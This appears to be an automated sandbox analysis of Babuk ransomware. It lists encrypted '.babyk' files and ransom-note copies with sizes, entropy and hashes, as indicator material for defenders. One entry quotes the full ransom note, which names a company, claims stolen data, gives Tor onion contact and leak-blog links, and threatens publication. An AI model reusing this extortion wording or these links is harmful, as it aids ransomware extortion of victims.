                                                                            SHA-256:EEDF44166077FF3626DEC202D12696E785244D03DB448906DED0498AC706843A
                                                                            SHA-512:75F99C16B734CA2B957D9086BAF34F39AF23C63B6B0F4918DE2B12446C30A6412768242B0DF39942584E00474112B83CD9A42343835CD0681FBC88CB7D527959
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\FENIVHOIKN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\IPKGELNTQY.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.849935636741708
                                                                            Encrypted:false
                                                                            SSDEEP:24:weXGXA1mhvEsD789dzX7S/kgVnTIjbwuFcfqx7JBcJ5LJaCrsPXWs:tsCOssnsdK/kglTIfwuFKq9J+7LvGF
                                                                            MD5:85B7C8F37142DC444CBDA99F49D83302
                                                                            SHA1:007B0746B9BA439D6DA5A4B29C0644502B7AA3E4
                                                                            SHA-256:34C4561B11DEB0C7BB328A43BAB16CCD0C97491A04B13C930291219803C51DAA
                                                                            SHA-512:9308F8160F62B8722072CE7ACB0F9477AE5BE57F1528E6BCA0104793C2D89A37782654BA421DB0F451D8384E8195AAD7CCAB745E5E852C3C94861789F4296249
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\JSDNGYCOWY.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.827258324278315
                                                                            Encrypted:false
                                                                            SSDEEP:24:N89Ow6lz40WckNn3Yg8SnA606x77WqWbqnNIQcaIh4bvm0qL4qq+oel9aZH:C/w2n2+x/WqWsEaIh4aXXBrs
                                                                            MD5:30F0FF7FD24BA9DE7FC861CE937374C1
                                                                            SHA1:8A356A4134371A562B92E97E73AC726953D4A913
                                                                            SHA-256:6B8A4D9F1DA1E950F308ABD86A74537520B1576FB9A8F36FBC0EFC386A59A06C
                                                                            SHA-512:B507A76C4041DFA2F9C7B3E34811AB7C87C3975D0FB2DBD15F0ACAE7797B4032614F96BE677588C0EFEEEEA7EC1A3C482C016EC101B2F311BA5CC1D9D51488B1
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\JSDNGYCOWY.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.840484872491164
                                                                            Encrypted:false
                                                                            SSDEEP:24:yjlDJSk0w+iLRthwbyZ4/5cvqBv9AEqhUM6NXXMjb1UTkYB7:yWTAhwbgKcvqBGEiUM6a31UQYB7
                                                                            MD5:88F94F52436DA6F6BC6EF3A502A83EFB
                                                                            SHA1:86CA4993E92390B5EC6813A00EFDB6FC8E3B57A0
                                                                            SHA-256:A921EC99E18DB1A4E566246D3E14EDB615EB15A4BF9AAC1E5A1AA9844B038A50
                                                                            SHA-512:1884B6B76B87BBF77FE26B7EC743632BF7E9A562D257AEB7D4BFFB161815535201B6C6D0FFD75F1711E251724FF7C4A57B3D6529E254922767D7CED667892611
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\KZWFNRXYKI.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8124785319081935
                                                                            Encrypted:false
                                                                            SSDEEP:24:Ns00TBr9yD7W8WM0EbdZXQe2IhRFAlCJCGRRvTPCa0DalR:Ns0U9yJWlo3Bh2CJCGfF7
                                                                            MD5:E49E6BA9D37FABDD197299DF070F45E0
                                                                            SHA1:E20F3C72E2A60F01641E18CC6F7B18248C6AF66A
                                                                            SHA-256:ED9348078B22C05413A9EAF3C49000BE8A17F862837699CF0636DD449B8C4AD2
                                                                            SHA-512:A9B35EAE7AE2643CCCD3E79D920FD4CA734E539D37DF8943C180B39B4A99249EF58A3BE800FF5527CF679AB1D645809ED993C7135163EBAC4F8E37559FFC9EE9
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\KZWFNRXYKI\BPMLNOBVSB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.825219466837543
                                                                            Encrypted:false
                                                                            SSDEEP:24:rUAAEVjyV41ViHnBz8ATZOkaABPqcFFSBXZM/wlktG7:rUAAZ41V8h8ATZOkaGqcfSVuSkY7
                                                                            MD5:81697EAEFAE446EC2B87F27C89FABE81
                                                                            SHA1:E25338485FD0B55C2081DB72B4D5927E0FFFD9F6
                                                                            SHA-256:90C42034282789007A62FB560F530EA252FCAC7CDC7DB07CB94DBE23328B36AE
                                                                            SHA-512:81A11C42BF50331D875A4C02BC9D1893580C4366DD7A4FE90640655F3DDD2B809708E605C7FA3C251B572E11B3D6EA53240A07FAA793EC21EA9AA8031E9C8167
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\KZWFNRXYKI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\KZWFNRXYKI\JSDNGYCOWY.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8242394445006305
                                                                            Encrypted:false
                                                                            SSDEEP:24:8tgHlOBjLMg/292+opHYL9FLpXdSFUR8ImCcJYyZX3WisFHa2xEjLS:8WHlOBj4l2VYJXdSrF6yXIF5xE6
                                                                            MD5:08E3EC2F7A6714570070CB918CFEB412
                                                                            SHA1:4F488A7ED594F4750BD5F1E6F0CCAF5AE3B11B5A
                                                                            SHA-256:82207357AF65F83A1830EBCC4ED17AAC8AF1AFD711EBB2CECA9B8BDE667BEB5A
                                                                            SHA-512:A5CDC7C90B88E99E62BB960246C1194831EE5CD36046790D43532598AB97595A90DCBB473B00423A565686ADFC3F9ECE9DE3D2E2071B398EDAC7136D6BBD1A63
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\KZWFNRXYKI\KZWFNRXYKI.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.83561134429068
                                                                            Encrypted:false
                                                                            SSDEEP:24:D+AXBVLNN48BbPvRIqFkfJE0ozCjeMwmoBKCn0eeE:D/RVZN4ebRXK7ozIDwbl
                                                                            MD5:3FA12E195169A491657C9B826AEAB137
                                                                            SHA1:DA792699652B73CDAC195E381D77E04C808C3183
                                                                            SHA-256:7D0F14A3FCA3A86884EA062D4CE73D8B7ED7B92C8021A06788262C1CB6B7A3D2
                                                                            SHA-512:88EE65550B8803834A4DC4B5209B30BBADEBE7B1FCA3EA777EBE5B747A50884485838AE5C0162546C70453EDA20CF028D73552F6ACE05058DD8115EA1F83A1DF
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\KZWFNRXYKI\NIKHQAIQAU.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.813812253740189
                                                                            Encrypted:false
                                                                            SSDEEP:24:5dXROZJ1xaU9jLropGIkd0gaWvLC3Zba1WxJ771WN4r1P/mk730hfKEkI:nyJ1xaURBIkdSFa1MTrl/mkQwW
                                                                            MD5:C283D79F8EC410594555112F0A8E300E
                                                                            SHA1:F66A45426BA1977873132A969165D51A5D76F914
                                                                            SHA-256:FFBBB0CD873DD9DA5E74FFCFF14C895883036A7D7B7D1BA9BA2D6CEB633B6139
                                                                            SHA-512:95549FF825B803CCB382E1ADE6F5FE32D0A04C0406FB7E753E008611681EF6853C644AF5763087EA0934467B775956FD07743809990394319CAB01B6DB8D8037
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\KZWFNRXYKI\RAYHIWGKDI.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.813470388900282
                                                                            Encrypted:false
                                                                            SSDEEP:24:nOKahQuPT6rY34fmLSz6NMMTX9pvdAn9ZzFCz+AW3pCgTGkILa:OKwQ82rYofCSL87dA/oVWsgmLa
                                                                            MD5:B3F358B0DE940F85BA81B9E83BC6600C
                                                                            SHA1:E5CC270AE862ADBB31CCC8E04C2398D280B44192
                                                                            SHA-256:4E68BDAA02045598E508E8E8B3F09D8CA842B93EACA0B897A0035A2BB83586D3
                                                                            SHA-512:243F5461C284C4F8869C05875EBE3B88078F73EA2B2DF3FDC812AC42050EA9E32CD68D28DF50135CD2135A537E429F00E64E2D60FE0F2D1A77B0E8E6A1F56F79
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\KZWFNRXYKI\ZBEDCJPBEY.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.824258169604056
                                                                            Encrypted:false
                                                                            SSDEEP:24:2z7EgemyfE/F1yOmdBaEJVI9Rbd+l5rYf2B3RcPYFirP:2z7EgemycN1yOa8CGa7MPi8
                                                                            MD5:E9A5B1EB6B07201F290FD448FAC96284
                                                                            SHA1:7B40D2D479B811B0805BD4F8FAEDA7E2F5A51A34
                                                                            SHA-256:40C94698EAD713A343C5B175845795C5763580F779F9D319A6A5DC573AA4C6BC
                                                                            SHA-512:253D56229947ADCCE2B407F34A3D0205D6FEFCD96AC5A7736E16D9D3E6A2F282FB27C1830350F3C90689E74F26E29592F622B740727CDE96B34A88A5A8F1B18D
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\NEBFQQYWPS\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\NIKHQAIQAU.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.79477543233275
                                                                            Encrypted:false
                                                                            SSDEEP:24:yGe3uFt3Muc4aV36xa5kwvQ6v8g+8C4HK90n7Nn9/LH4qMlTMP69u1buv0j3K:yGe3uL3I36z6EgNA9a77cFe6sbukK
                                                                            MD5:33E64A67E2138EBB530E490EAA0B820C
                                                                            SHA1:3EC21420AFBEACA891007F15C8EBE74B34639EB4
                                                                            SHA-256:7839C9F7E9789F6F8449F83994AEA079A665A400382A938DD4511996284E4EEB
                                                                            SHA-512:5169976D3BCF7206CEE2C5778C525A21013B73C2B312BABD2D5A4A7DFB9DBFF4813B583749D70BE1176A855281EDEA61FFF715E066EE2A5D113825BC8CF5B6DC
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\NIKHQAIQAU.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.833547524020572
                                                                            Encrypted:false
                                                                            SSDEEP:24:QmIUE0ve8NxS8SyEz5vUsRf5mBdlrbmkYmTrSCZQk6ZPb5hxgpK:QKve8NxSrdhUsf5EJS8J6ZPVhxgw
                                                                            MD5:6DC9A0F966CC9EE59ADCA7065483A8EA
                                                                            SHA1:2BD63BF32358558DFFC2A2725B76FA38A1B94FCF
                                                                            SHA-256:8D7967B5B509D95519ACD3250E6C413D759B2F45F2CD56983CF8613B80BC0996
                                                                            SHA-512:A015479AF37B69B7B1AD79DF40F3EE08D6BB3FB21AA3C64E0C4012C37F7DC9289A8D4B309C8EF5E6148C4E119AB43E82982DAF6E071AD1DA8902C9FA5389A903
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\NIKHQAIQAU.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.820655117629328
                                                                            Encrypted:false
                                                                            SSDEEP:24:9FYWnwkeckPij1CHcG80Q+QDj7an6fdiS3TPX7A7f60d9RNhLZGs71HkQvJ:9FVwckKQ8t+QJ1iOfofjvRjLZVvJ
                                                                            MD5:24EF76B491C313A1F46ECCC53403A826
                                                                            SHA1:C693D53AF951B8E582D1A5BC838BD5F7A2ACFD3B
                                                                            SHA-256:2793B7D23350F66C38A0504A5DED96ADAAFED6760345E27D74D553887282A718
                                                                            SHA-512:C5641A31C58BFA7E0C67DEE206DB156678891BA9BD86CEB5836E85689C6C05FE5A8C22B592E2B08572E896FB649222AC2FCF673DB951BB5D78373BB32B707812
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\NIKHQAIQAU\FENIVHOIKN.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.816553483852325
                                                                            Encrypted:false
                                                                            SSDEEP:24:PaiQqtROP5NX/JzurYJ4AG7rqGqrsZAUS5v7Rzcf4YBl1fi5:PvTbOP5NPJu0Jy+GrtSV+fbBlQ5
                                                                            MD5:68DC6CAFD0A9DE51A1C918242EF9A9CD
                                                                            SHA1:C207140429A0E3E4DC4EF3F1C805E018D42780A6
                                                                            SHA-256:5F57CD613F40FB4F55C438BCED0DA9BD09022E2C09A466E5C213BCC301C82D70
                                                                            SHA-512:C5DF121EBE52588742CB483D31594940944C5D8ECB59016B9E519840C9EA8BAA304F40E35BB4BA858E15166D40E048747B000D6AA70F46B9B39750345DDB6A39
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\NIKHQAIQAU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\NIKHQAIQAU\IPKGELNTQY.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.820201218424555
                                                                            Encrypted:false
                                                                            SSDEEP:24:ul/un/4/l9Jn3MjxXfUSFzEFkapTmmpBSnS2hkwC5ZdF:ul/pJ36xXfUGYhp66cclF
                                                                            MD5:2EC40DBFA86C4A59EFE8A94C1510E393
                                                                            SHA1:2DADBB8B9816BBC54B7A68B9EBB11E1A65D88098
                                                                            SHA-256:DA11952254CBFC9C2A61BD21B3D26F95A13C2DEAD5A868CA9998425877C981FE
                                                                            SHA-512:6472574093ECCAECA351BAFB8163A6DDED99BD0692E8F1F10792B501DF43BF7BC186BBDA1690AAFA016C35EFCE2AB6912595038F8CCFDF66701B9C2132178CCD
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\NIKHQAIQAU\NIKHQAIQAU.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.822592069298165
                                                                            Encrypted:false
                                                                            SSDEEP:24:UeSbH1YILnYbzbY0YYT/AlO+CanSBRSRzD/o83XTdwpvX0q:qPLYbzdYNMaERalXRuvX0q
                                                                            MD5:CA2B6548349711B6DE557D51F891C86B
                                                                            SHA1:2D093A46244D18C5AA1B6C1200824347B6AD5E4D
                                                                            SHA-256:FBCCC10122FBF8F0CA94DEC98BBE93E553EA0BC9113C73E2D7CEC629915BA3C9
                                                                            SHA-512:FB845E0A9E02FA9CBFB97697F052FD1F8AF4AC611C4CA676E3E78248E6E5B3C74C401D29EFE318B27FBEB534DBA1D3D25F26B125C8B0846E6BF467CCBFA5AB04
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\NIKHQAIQAU\UOOJJOZIRH.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.847382388132021
                                                                            Encrypted:false
                                                                            SSDEEP:24:nJrMpNqMkBX8Q0/l1oWkdj6c0XMV6zM9c5db2VNVR:nJr2NkBXKl+jB6g6zM9EdyVx
                                                                            MD5:A76AA48F6BB50EA71D1639B23A6A22B4
                                                                            SHA1:C78112F833E4E590C2BD69271B92EA74C3441637
                                                                            SHA-256:795F182F8C5B44C34EBCF0CC2CF4007227F390B5FA96881CECB8FBDACE4D1888
                                                                            SHA-512:34F65B1B994AF7960A85316F2DABE05AF95838557AF7AFFD25C1754E24FC0D1C1896C0847F01AD8C409693B9C4405E04ADF2442BC3A7F69A2BE2D50037E16B55
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\NIKHQAIQAU\ZQIXMVQGAH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.811960614549262
                                                                            Encrypted:false
                                                                            SSDEEP:24:i7h9QiQssOUyhkbynwYG5NNl64j4cE160oPm+ZXdb/t1JKBq3o:izp4OFynR64j9m+ZXdDt/cR
                                                                            MD5:2FACF243BD964F7F3BE964DDF9E046DB
                                                                            SHA1:2DD2E41381FDE0D5DF9DE002F71D1024FC7914D0
                                                                            SHA-256:590C5BCBD62A45937405D312D889C598BD9A06577281F6D523E4FCB07CC116C9
                                                                            SHA-512:B23488811AEC64CBB6CDCD874600225711E2346B4714F32AC6DC4ADCB0F3A59026651209D049BE08E9264EA39005B7A9A3EFA3899B51B159F5B361B716A54935
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\NIKHQAIQAU\ZTGJILHXQB.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8243500017427845
                                                                            Encrypted:false
                                                                            SSDEEP:24:i0yH6NEKYCU2iG+z53O1EhLL5UK72QaU+tYHm9iQakTRxFycntHS/:dyHrKi5z9O+5X72QstYH4zzRn5S/
                                                                            MD5:6C55829841A57100D6C047E4E9693F2B
                                                                            SHA1:02A2355BD35924E3CFE86F5A1778D1899894AA2A
                                                                            SHA-256:76ACFB2F5BF75F9FDC1CBA7BB2653840B406F3AB2579B9DF3CC0F28B92A1BA6C
                                                                            SHA-512:3333C8FC6780FCA595F081A64B79A927D3E66B7DF236E1ED83073331A15118E387B247B6AFD0E3BF1D9E18A6A0440098BF82D999E0DA4C0042F92E8CCC9937B3
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\PIVFAGEAAV\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Documents\QCFWYSKMHA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\RAYHIWGKDI.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8145076640498985
                                                                            Encrypted:false
                                                                            SSDEEP:24:e4b/+uy0igRfWkCu6aljiXQiFtMr2/bWZdSnf3bmrb/g:e4b+u/iUv6alsDFCHZEnfro/g
                                                                            MD5:AB3DB307994C32FDADE114E6503FF40E
                                                                            SHA1:A6172395A539F0E161682C57CD3E038CCAC1E590
                                                                            SHA-256:FC5EF556ADF34CB47010A315BB88C9D25AFEE2F700BF0E4C25246C6726C51A82
                                                                            SHA-512:7F90E57A25E32D84DBDEC741B8BFC9146368DFB16B9E67FCB786E7D2BEE17EC005EB872D9649EA0EB55C05EE3AC98864400E5354734BA48388CA9870EE6B7764
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\RAYHIWGKDI.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.798389431214604
                                                                            Encrypted:false
                                                                            SSDEEP:24:d1w4tHXFu45FgJHopTkp4bh/gVeAI7wiuxP/nu/e/BXQspnltHya+sFzGg:d1w4uEsHvAh/UIDWHuSpnltHM8j
                                                                            MD5:B3A963674C207915EACC7B38A6447A5B
                                                                            SHA1:F4A14FCFA9B2F9FA76CD044DAEADE3E1B14B2800
                                                                            SHA-256:A3EE956D5E4D3A6BEFAF8AFF6A7FC8193B50995136C95B93FE1B4826B6FD88D2
                                                                            SHA-512:8AE69550E9E83DB48ABA3CB67760A42701EF1CFA2B2CF0FDE53C549B98B913D075A0A89947DA3D7BAE6A8793C2CD0D61CF3FFC202D8CC0AC03D5E3ACA1576474
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\SFPUSAFIOL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\UOOJJOZIRH.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.825265249949243
                                                                            Encrypted:false
                                                                            SSDEEP:24:3Kd/EZzHpcsVj98XWNxpG+OuA8kQeDNHKTEiFdsmaC8I4EZfU5REb3cBEese:gcZzHdYXWNxU+OGkQeViP8mSEZrM/d
                                                                            MD5:16C9726F77356C85DADB830CCBA4DC87
                                                                            SHA1:26DC6EEDC22DD3231FA68008E166605D707721FB
                                                                            SHA-256:F201336DC91CC08153A6B41B7C6E1632501E616D5D6D453CD96FC145C62875F4
                                                                            SHA-512:818F9B6305A0EF792768715D942E5CDE7F161AF31FB31EA48F8CBEF551CF4C8922061D48E4DF94A8496C301641C287C875A94B546FBAAFB219C2FBCD0E60896F
                                                                            Malicious:false
                                                                            C:\Users\user\Documents\UOOJJOZIRH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.818762643644819
                                                                            Encrypted:false
